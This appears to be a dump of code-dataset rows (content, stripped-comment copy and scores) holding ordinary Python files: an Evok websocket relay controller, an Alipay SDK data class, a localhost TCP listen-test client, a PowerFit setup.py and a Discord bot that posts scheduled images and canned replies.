on_message = lambda ws,msg: self.on_message(ws, msg),
on_error = lambda ws,msg: self.on_error(ws, msg),
on_close = lambda ws: self.on_close(ws),
on_open = lambda ws: self.on_open(ws))
self.ws.run_forever()
def long_press_timer(self):
dprint("Timer is Started")
self.long_press_button_active = 1
while self.long_press_timer_countdown > 0:
time.sleep(.1)
self.long_press_timer_countdown -= 1
dprint(self.long_press_timer_countdown)
if self.long_press_button_active:
self.all_off()
dprint("Timer Stopped")
def on_message(self,ws, message):
try:
j = json.loads(message)
dprint(j)
except:
pass
else:
if j['dev'] == 'input' and j['bitvalue'] == 0:
self.long_press_timer_countdown = 0
self.long_press_button_active = 0
#check for digital input and button is pushed in
elif j['dev'] == 'input' and j['bitvalue'] == 1:
self.long_press_timer_countdown = self.WAITTIME
self.Timer = Thread(target = self.long_press_timer )
self.Timer.start()
action = self.di_relay_dict.get(j['circuit'])
# If the action is a digit toggle the relay with that number
if action.isdigit():
self.toggle_relay = 1
#we need to retrieve the current state of the relay so we set the toggle_relay to 1 to know we are expecting an answer on a question we asked
self.ws.send('{"cmd":"full","dev":"relay","circuit":"%s"}' %(j['circuit']))
#if the action is allon switch all relays on
elif action == 'allon':
self.all_on()
elif action == 'alloff':
self.all_off()
#check if we asked to toggle a relay if yes toggle it
elif self.toggle_relay == 1 and j['dev'] == 'relay':
self.toggle_relay = 0
if j['value'] == 1:
ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"0"}'%(j['circuit']))
else:
ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"1"}'%(j['circuit']))
def all_on(self):
for x in range (1,9):
self.ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"1"}' %(x))
time.sleep(0.05)
def all_off(self):
for x in range (1,9):
self.ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"0"}' %(x))
time.sleep(0.05)
def on_error(self,ws, error):
print(error)
def on_close(self,ws):
print ("### closed ###")
def on_open(self,ws):
print ("### opened ###")
# just wait half a second to give the server some time
time.sleep(.5)
if __name__ == "__main__":
app= myhome()
| #############################################################################################################################
# Example 3: Basic websocket application to interact with evok api #
# Extension of the second example websocket2 #
# Adding a Long Press Button Event: #
# I implemented this on the client side #
# We start a Timer (longpress timer) on a button press #
# If the button is not released in 3 second we turn off all relays #
# We achieve this to check inside the timer function if the long press is still active after 3s #
# If the button is released before the 3 seconds are done we receive a message from the server #
# signaling the button is released by sending a bitvalue of 0 #
# if we receive this message we set the long_press_button_active = 0 #
# and we set the long_press_timer = 0 so our Timer exits #
# #
# #
# #
# #
# Example create by <NAME> #
# On 2019-05-15 #
#############################################################################################################################
import websocket
import time
import json
from threading import Thread
def dprint(e):
debug = 1
if debug:
print(e)
class myhome():
def __init__(self):
#define in 1/10 of seconds
self.WAITTIME = 20
self.long_press_timer_countdown = 0
self.long_press_button_active = 0
self.Timer = None
self.toggle_relay = 0
self.di_relay_dict = {'1':'allon','2':'2','3':'3','4':'4','5':'5','6':'6','7':'7','8':'8'}
self.ws = websocket.WebSocketApp("ws://localhost/ws",
on_message = lambda ws,msg: self.on_message(ws, msg),
on_error = lambda ws,msg: self.on_error(ws, msg),
on_close = lambda ws: self.on_close(ws),
on_open = lambda ws: self.on_open(ws))
self.ws.run_forever()
def long_press_timer(self):
dprint("Timer is Started")
self.long_press_button_active = 1
while self.long_press_timer_countdown > 0:
time.sleep(.1)
self.long_press_timer_countdown -= 1
dprint(self.long_press_timer_countdown)
if self.long_press_button_active:
self.all_off()
dprint("Timer Stopped")
def on_message(self,ws, message):
try:
j = json.loads(message)
dprint(j)
except:
pass
else:
if j['dev'] == 'input' and j['bitvalue'] == 0:
self.long_press_timer_countdown = 0
self.long_press_button_active = 0
#check for digital input and button is pushed in
elif j['dev'] == 'input' and j['bitvalue'] == 1:
self.long_press_timer_countdown = self.WAITTIME
self.Timer = Thread(target = self.long_press_timer )
self.Timer.start()
action = self.di_relay_dict.get(j['circuit'])
# If the action is a digit toggle the relay with that number
if action.isdigit():
self.toggle_relay = 1
#we need to retrieve the current state of the relay so we set the toggle_relay to 1 to know we are expecting an answer on a question we asked
self.ws.send('{"cmd":"full","dev":"relay","circuit":"%s"}' %(j['circuit']))
#if the action is allon switch all relays on
elif action == 'allon':
self.all_on()
elif action == 'alloff':
self.all_off()
#check if we asked to toggle a relay if yes toggle it
elif self.toggle_relay == 1 and j['dev'] == 'relay':
self.toggle_relay = 0
if j['value'] == 1:
ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"0"}'%(j['circuit']))
else:
ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"1"}'%(j['circuit']))
def all_on(self):
for x in range (1,9):
self.ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"1"}' %(x))
time.sleep(0.05)
def all_off(self):
for x in range (1,9):
self.ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"0"}' %(x))
time.sleep(0.05)
def on_error(self,ws, error):
print(error)
def on_close(self,ws):
print ("### closed ###")
def on_open(self,ws):
print ("### opened ###")
# just wait half a second to give the server some time
time.sleep(.5)
if __name__ == "__main__":
app= myhome()
| en | 0.640413 | ############################################################################################################################# # Example 3: Basic websocket application to interact with evok api # # Extension of the second example websocket2 # # Adding a Long Press Button Event: # # I implemented this on the client side # # We start a Timer (longpress timer) on a button press # # If the button is not released in 3 second we turn off all relays # # We achieve this to check inside the timer function if the long press is still active after 3s # # If the button is released before the 3 seconds are done we receive a message from the server # # signaling the button is released by sending a bitvalue of 0 # # if we receive this message we set the long_press_button_active = 0 # # and we set the long_press_timer = 0 so our Timer exits # # # # # # # # # # Example create by <NAME> # # On 2019-05-15 # ############################################################################################################################# #define in 1/10 of seconds #check for digital input and button is pushed in # If the action is a digit toggle the relay with that number #we need to retrieve the current state of the relay so we set the toggle_relay to 1 to know we are expecting an answer on a question we asked #if the action is allon switch all relays on #check if we asked to toggle a relay if yes toggle it ## closed ###") ## opened ###") # just wait half a second to give the server some time | 2.663792 | 3 |
alipay/aop/api/domain/ProductSimpleInfo.py | antopen/alipay-sdk-python-all | 0 | 6614001 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ProductSimpleInfo(object):
def __init__(self):
self._category_name = None
self._count = None
self._end_time = None
self._product_name = None
self._product_type = None
self._sale_price = None
self._start_time = None
self._zone_name = None
@property
def category_name(self):
return self._category_name
@category_name.setter
def category_name(self, value):
self._category_name = value
@property
def count(self):
return self._count
@count.setter
def count(self, value):
self._count = value
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
self._end_time = value
@property
def product_name(self):
return self._product_name
@product_name.setter
def product_name(self, value):
self._product_name = value
@property
def product_type(self):
return self._product_type
@product_type.setter
def product_type(self, value):
self._product_type = value
@property
def sale_price(self):
return self._sale_price
@sale_price.setter
def sale_price(self, value):
self._sale_price = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
self._start_time = value
@property
def zone_name(self):
return self._zone_name
@zone_name.setter
def zone_name(self, value):
self._zone_name = value
def to_alipay_dict(self):
params = dict()
if self.category_name:
if hasattr(self.category_name, 'to_alipay_dict'):
params['category_name'] = self.category_name.to_alipay_dict()
else:
params['category_name'] = self.category_name
if self.count:
if hasattr(self.count, 'to_alipay_dict'):
params['count'] = self.count.to_alipay_dict()
else:
params['count'] = self.count
if self.end_time:
if hasattr(self.end_time, 'to_alipay_dict'):
params['end_time'] = self.end_time.to_alipay_dict()
else:
params['end_time'] = self.end_time
if self.product_name:
if hasattr(self.product_name, 'to_alipay_dict'):
params['product_name'] = self.product_name.to_alipay_dict()
else:
params['product_name'] = self.product_name
if self.product_type:
if hasattr(self.product_type, 'to_alipay_dict'):
params['product_type'] = self.product_type.to_alipay_dict()
else:
params['product_type'] = self.product_type
if self.sale_price:
if hasattr(self.sale_price, 'to_alipay_dict'):
params['sale_price'] = self.sale_price.to_alipay_dict()
else:
params['sale_price'] = self.sale_price
if self.start_time:
if hasattr(self.start_time, 'to_alipay_dict'):
params['start_time'] = self.start_time.to_alipay_dict()
else:
params['start_time'] = self.start_time
if self.zone_name:
if hasattr(self.zone_name, 'to_alipay_dict'):
params['zone_name'] = self.zone_name.to_alipay_dict()
else:
params['zone_name'] = self.zone_name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ProductSimpleInfo()
if 'category_name' in d:
o.category_name = d['category_name']
if 'count' in d:
o.count = d['count']
if 'end_time' in d:
o.end_time = d['end_time']
if 'product_name' in d:
o.product_name = d['product_name']
if 'product_type' in d:
o.product_type = d['product_type']
if 'sale_price' in d:
o.sale_price = d['sale_price']
if 'start_time' in d:
o.start_time = d['start_time']
if 'zone_name' in d:
o.zone_name = d['zone_name']
return o
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ProductSimpleInfo(object):
def __init__(self):
self._category_name = None
self._count = None
self._end_time = None
self._product_name = None
self._product_type = None
self._sale_price = None
self._start_time = None
self._zone_name = None
@property
def category_name(self):
return self._category_name
@category_name.setter
def category_name(self, value):
self._category_name = value
@property
def count(self):
return self._count
@count.setter
def count(self, value):
self._count = value
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
self._end_time = value
@property
def product_name(self):
return self._product_name
@product_name.setter
def product_name(self, value):
self._product_name = value
@property
def product_type(self):
return self._product_type
@product_type.setter
def product_type(self, value):
self._product_type = value
@property
def sale_price(self):
return self._sale_price
@sale_price.setter
def sale_price(self, value):
self._sale_price = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
self._start_time = value
@property
def zone_name(self):
return self._zone_name
@zone_name.setter
def zone_name(self, value):
self._zone_name = value
def to_alipay_dict(self):
params = dict()
if self.category_name:
if hasattr(self.category_name, 'to_alipay_dict'):
params['category_name'] = self.category_name.to_alipay_dict()
else:
params['category_name'] = self.category_name
if self.count:
if hasattr(self.count, 'to_alipay_dict'):
params['count'] = self.count.to_alipay_dict()
else:
params['count'] = self.count
if self.end_time:
if hasattr(self.end_time, 'to_alipay_dict'):
params['end_time'] = self.end_time.to_alipay_dict()
else:
params['end_time'] = self.end_time
if self.product_name:
if hasattr(self.product_name, 'to_alipay_dict'):
params['product_name'] = self.product_name.to_alipay_dict()
else:
params['product_name'] = self.product_name
if self.product_type:
if hasattr(self.product_type, 'to_alipay_dict'):
params['product_type'] = self.product_type.to_alipay_dict()
else:
params['product_type'] = self.product_type
if self.sale_price:
if hasattr(self.sale_price, 'to_alipay_dict'):
params['sale_price'] = self.sale_price.to_alipay_dict()
else:
params['sale_price'] = self.sale_price
if self.start_time:
if hasattr(self.start_time, 'to_alipay_dict'):
params['start_time'] = self.start_time.to_alipay_dict()
else:
params['start_time'] = self.start_time
if self.zone_name:
if hasattr(self.zone_name, 'to_alipay_dict'):
params['zone_name'] = self.zone_name.to_alipay_dict()
else:
params['zone_name'] = self.zone_name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ProductSimpleInfo()
if 'category_name' in d:
o.category_name = d['category_name']
if 'count' in d:
o.count = d['count']
if 'end_time' in d:
o.end_time = d['end_time']
if 'product_name' in d:
o.product_name = d['product_name']
if 'product_type' in d:
o.product_type = d['product_type']
if 'sale_price' in d:
o.sale_price = d['sale_price']
if 'start_time' in d:
o.start_time = d['start_time']
if 'zone_name' in d:
o.zone_name = d['zone_name']
return o | en | 0.352855 | #!/usr/bin/env python # -*- coding: utf-8 -*- | 2.29194 | 2 |
python/6.net/3.Ext/2.listen_test_client.py | dunitian/BaseCode | 25 | 6614002 | <reponame>dunitian/BaseCode<filename>python/6.net/3.Ext/2.listen_test_client.py
import time
import socket
def main():
for i in range(1000):
with socket.socket() as tcp_client:
tcp_client.connect(('127.0.0.1', 8080))
if i % 100 == 0:
tcp_client.send(b"-" * 10)
time.sleep(1)
if __name__ == "__main__":
main()
| import time
import socket
def main():
for i in range(1000):
with socket.socket() as tcp_client:
tcp_client.connect(('127.0.0.1', 8080))
if i % 100 == 0:
tcp_client.send(b"-" * 10)
time.sleep(1)
if __name__ == "__main__":
main() | none | 1 | 2.633188 | 3 | |
setup.py | WangXinyan940/powerfit | 16 | 6614003 | #! env/bin/python
import os.path
import numpy
from setuptools import setup
from setuptools.extension import Extension
try:
from Cython.Distutils import build_ext
from Cython.Build import cythonize
CYTHON = True
except ImportError:
CYTHON = False
def main():
packages = ['powerfit']
# the C or Cython extension
ext = '.pyx' if CYTHON else '.c'
ext_modules = [Extension("powerfit._powerfit",
[os.path.join("src", "_powerfit" + ext)],
include_dirs=[numpy.get_include()]),
Extension("powerfit._extensions",
[os.path.join("src", "_extensions.c")],
include_dirs=[numpy.get_include()],
extra_compile_args=['-ffast-math'],
),
]
cmdclass = {}
if CYTHON:
ext_modules = cythonize(ext_modules)
cmdclass = {'build_ext' : build_ext}
package_data = {'powerfit': [os.path.join('data', '*.npy'), 'kernels.cl']}
description = ("Rigid body fitting of high-resolution structures in "
"low-resolution cryo-electron microscopy density maps")
setup(name="powerfit",
version='2.0.0',
description=description,
url="https://github.com/haddocking/powerfit",
author='<NAME>',
author_email='<EMAIL>',
license="Apache",
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
packages=packages,
package_data = package_data,
install_requires=['numpy>=1.8', 'scipy'],
entry_points={
'console_scripts': [
'powerfit = powerfit.powerfit:main',
'image-pyramid = powerfit.scripts:image_pyramid',
'em2em = powerfit.scripts:em2em',
]
},
ext_modules=ext_modules,
include_dirs=[numpy.get_include()],
cmdclass=cmdclass,
)
if __name__=='__main__':
main()
| #! env/bin/python
import os.path
import numpy
from setuptools import setup
from setuptools.extension import Extension
try:
from Cython.Distutils import build_ext
from Cython.Build import cythonize
CYTHON = True
except ImportError:
CYTHON = False
def main():
packages = ['powerfit']
# the C or Cython extension
ext = '.pyx' if CYTHON else '.c'
ext_modules = [Extension("powerfit._powerfit",
[os.path.join("src", "_powerfit" + ext)],
include_dirs=[numpy.get_include()]),
Extension("powerfit._extensions",
[os.path.join("src", "_extensions.c")],
include_dirs=[numpy.get_include()],
extra_compile_args=['-ffast-math'],
),
]
cmdclass = {}
if CYTHON:
ext_modules = cythonize(ext_modules)
cmdclass = {'build_ext' : build_ext}
package_data = {'powerfit': [os.path.join('data', '*.npy'), 'kernels.cl']}
description = ("Rigid body fitting of high-resolution structures in "
"low-resolution cryo-electron microscopy density maps")
setup(name="powerfit",
version='2.0.0',
description=description,
url="https://github.com/haddocking/powerfit",
author='<NAME>',
author_email='<EMAIL>',
license="Apache",
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
packages=packages,
package_data = package_data,
install_requires=['numpy>=1.8', 'scipy'],
entry_points={
'console_scripts': [
'powerfit = powerfit.powerfit:main',
'image-pyramid = powerfit.scripts:image_pyramid',
'em2em = powerfit.scripts:em2em',
]
},
ext_modules=ext_modules,
include_dirs=[numpy.get_include()],
cmdclass=cmdclass,
)
if __name__=='__main__':
main()
| en | 0.468228 | #! env/bin/python # the C or Cython extension | 1.813716 | 2 |
discordbot.py | markbasser/supergirls | 0 | 6614004 | <gh_stars>0
from discord.ext import commands
from discord.ext import tasks
import os
import traceback
import discord
from datetime import datetime
token = os.environ['DISCORD_BOT_TOKEN']
CHANNEL_ID =757346851963011172 #チャンネルID
# 接続に必要なオブジェクトを生成
client = discord.Client()
@client.event
async def on_ready():
"""起動時に通知してくれる処理"""
print('ログインしました')
print(client.user.name) # ボットの名前
print(client.user.id) # ボットのID
print(discord.__version__) # discord.pyのバージョン
print('------')
# 60秒に一回ループ
@tasks.loop(seconds=60)
async def loop():
# 現在の時刻
now = datetime.now().strftime('%H:%M')
if now == '00:01':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758285489257054238/xjpsupergirls_ani05ban.gif')
if now == '01:02':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758286779920285747/xjpsupergirls_ani07ban.gif')
if now == '02:03':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://media.discordapp.net/attachments/741585316703633419/758286759716323328/xjpsupergirls_ani06ban.gif')
if now == '03:04':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757745371765145630/xjpsupergirls_ani00ban.gif')
if now == '04:05':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759865044074536/xjpsupergirls_ani04ban.gif')
if now == '05:31':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759856789815356/xjpsupergirls_ani03ban.gif')
if now == '06:37':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759841237205103/xjpsupergirls_ani02ban.gif')
if now == '08:00':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757745371765145630/xjpsupergirls_ani00ban.gif')
if now == '09:27':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757458033533124649/XJPGIRL00.png')
if now == '11:28':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757458053707726880/XJPGIRL02.png')
if now == '12:29':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757159787996905552/xjpimage02.gif')
if now == '13:40':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758668048613507102/xjpgirls2.png')
if now == '14:30':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758655911841103892/xjpgirls1.png')
if now == '16:31':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758286759716323328/xjpsupergirls_ani06ban.gif')
if now == '20:58':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758285489257054238/xjpsupergirls_ani05ban.gif')
#ループ処理実行
loop.start()
@client.event
async def on_message(message):
"""メッセージを処理"""
if message.author.bot: # ボットのメッセージをハネる
return
if message.content == "<:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441>") # f文字列(フォーマット済み文字列リテラル)
if message.content == "<:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535>") # f文字列(フォーマット済み文字列リテラル)
if message.content == "ThankYou!!":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💛{message.author.mention} 💛 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Thank U":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💚 {message.author.mention} 💚 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Thank you everybody":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💙 {message.author.mention} 💙 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "g.morning":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear♥ {message.author.mention}♥. good Morning🌞") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Good day all":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear♥ {message.author.mention}♥. Thank YOU! Good luck🌟 ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "<:xjp_coin:739313946045055117> <:xjp_coin:739313946045055117> <:xjp_coin:739313946045055117>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:gf:721588114283298908> 💚{message.author.mention}さん💚 <:xjp_coin:739313946045055117> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_01:757806007475896441>") # f文字列(フォーマット済み文字列リテラル)
elif message.content == "r/link":
# リアクションアイコンを付けたい
q = await message.channel.send("/link ")
[await q.add_reaction(i) for i in ('⭕', '❌')] # for文の内包表記
elif message.content == "r/r":
# リアクションアイコンを付けたい
q = await message.channel.send("$deposit")
[await q.add_reaction(i) for i in ('⭕', '❌')] # for文の内包表記
elif message.content == "r/bal":
# リアクションアイコンを付けたい
q = await message.channel.send("$bal")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/benzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info ben ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/jpynzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info jpyn ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/bgptzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info bgpt ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/kenjzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info kenj ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/sprtszan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info sprts ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/29zan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info 29coin ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
# Botの起動とDiscordサーバーへの接続
client.run(token)
| from discord.ext import commands
from discord.ext import tasks
import os
import traceback
import discord
from datetime import datetime
token = os.environ['DISCORD_BOT_TOKEN']
CHANNEL_ID =757346851963011172 #チャンネルID
# 接続に必要なオブジェクトを生成
client = discord.Client()
@client.event
async def on_ready():
"""起動時に通知してくれる処理"""
print('ログインしました')
print(client.user.name) # ボットの名前
print(client.user.id) # ボットのID
print(discord.__version__) # discord.pyのバージョン
print('------')
# 60秒に一回ループ
@tasks.loop(seconds=60)
async def loop():
# 現在の時刻
now = datetime.now().strftime('%H:%M')
if now == '00:01':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758285489257054238/xjpsupergirls_ani05ban.gif')
if now == '01:02':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758286779920285747/xjpsupergirls_ani07ban.gif')
if now == '02:03':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://media.discordapp.net/attachments/741585316703633419/758286759716323328/xjpsupergirls_ani06ban.gif')
if now == '03:04':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757745371765145630/xjpsupergirls_ani00ban.gif')
if now == '04:05':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759865044074536/xjpsupergirls_ani04ban.gif')
if now == '05:31':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759856789815356/xjpsupergirls_ani03ban.gif')
if now == '06:37':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759841237205103/xjpsupergirls_ani02ban.gif')
if now == '08:00':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757745371765145630/xjpsupergirls_ani00ban.gif')
if now == '09:27':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757458033533124649/XJPGIRL00.png')
if now == '11:28':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757458053707726880/XJPGIRL02.png')
if now == '12:29':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757159787996905552/xjpimage02.gif')
if now == '13:40':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758668048613507102/xjpgirls2.png')
if now == '14:30':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758655911841103892/xjpgirls1.png')
if now == '16:31':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758286759716323328/xjpsupergirls_ani06ban.gif')
if now == '20:58':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758285489257054238/xjpsupergirls_ani05ban.gif')
#ループ処理実行
loop.start()
@client.event
async def on_message(message):
"""メッセージを処理"""
if message.author.bot: # ボットのメッセージをハネる
return
if message.content == "<:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441>") # f文字列(フォーマット済み文字列リテラル)
if message.content == "<:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535>") # f文字列(フォーマット済み文字列リテラル)
if message.content == "ThankYou!!":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💛{message.author.mention} 💛 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Thank U":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💚 {message.author.mention} 💚 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Thank you everybody":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💙 {message.author.mention} 💙 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "g.morning":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear♥ {message.author.mention}♥. good Morning🌞") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Good day all":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear♥ {message.author.mention}♥. Thank YOU! Good luck🌟 ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "<:xjp_coin:739313946045055117> <:xjp_coin:739313946045055117> <:xjp_coin:739313946045055117>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:gf:721588114283298908> 💚{message.author.mention}さん💚 <:xjp_coin:739313946045055117> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_01:757806007475896441>") # f文字列(フォーマット済み文字列リテラル)
elif message.content == "r/link":
# リアクションアイコンを付けたい
q = await message.channel.send("/link ")
[await q.add_reaction(i) for i in ('⭕', '❌')] # for文の内包表記
elif message.content == "r/r":
# リアクションアイコンを付けたい
q = await message.channel.send("$deposit")
[await q.add_reaction(i) for i in ('⭕', '❌')] # for文の内包表記
elif message.content == "r/bal":
# リアクションアイコンを付けたい
q = await message.channel.send("$bal")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/benzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info ben ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/jpynzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info jpyn ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/bgptzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info bgpt ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/kenjzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info kenj ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/sprtszan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info sprts ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/29zan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info 29coin ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
# Botの起動とDiscordサーバーへの接続
